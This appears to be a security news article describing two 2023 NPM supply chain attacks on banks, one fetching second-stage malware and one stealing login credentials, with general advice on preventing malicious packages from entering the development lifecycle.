For the first time, the banking sector has been explicitly targeted by two distinct Open-Source Software (OSS) supply chain attacks that enabled attackers to stealthily overlay the banking sites. The development comes at a time when organizations across the globe are recovering from the infamous MOVEit Transfer hack, exposing an immense risk in supply chain security.
These attacks were discovered in the first half of 2023, showcasing advanced techniques used by attackers, such as the targeting of specific components in web assets of a victim bank by attaching malicious functionalities to them.
Unveiling the first incident
The first attack took place between April 5 and April 7, wherein a threat actor posed as an employee of the target bank and uploaded a couple of malicious packages containing pre-installed scripts onto the NPM registry. To avoid suspicion, the attacker had also created a fake LinkedIn page for the purported bank employee.
Once executed, the script determined the type of OS (Windows, Linux, or macOS) used on the victim’s system and proceeded to download second-stage malware from a remote server by using a subdomain on Azure that incorporated the name of the target bank.
Furthermore, the attacker leveraged an advanced post-exploitation tool, the Havoc framework, to evade defenses, such as Windows Defender, in the second stage of the attack.
About the second incident
In the second attack detected in February, the adversary added malicious code to an NPM package meant to blend into the website of the victim bank and lay dormant until it was prompted to spring into action.
The malicious code was specifically designed to covertly intercept login data and exfiltrate the details to an actor-controlled infrastructure.
What does this indicate?
Traditionally, organizations primarily focused on scanning for vulnerabilities when packages reached the building level in the Software Development Lifecycle (SDLC). However, these practices are not enough in the face of today’s advanced cyber threats.
As threat actors evolve their attack tactics to launch software supply chain attacks, it’s paramount for organizations to realize that they need to shift to proactive strategies to prevent malicious packages from entering the SDLC in the first place.
They need to proactively adopt new protective measures and integrate security architecture to prevent infiltration at every stage of the lifecycle.
Conclusion
Banks and other financial services organizations remain a lucrative target for cyber intruders due to multiple factors, including the financial assets and sensitive data at stake. Researchers anticipate a steady escalation in targeted attacks on such entities. Therefore, organizations must equip themselves with the best early threat alerting and sharing platforms that can enable them to promptly identify the risks and perform threat assessment in real-time.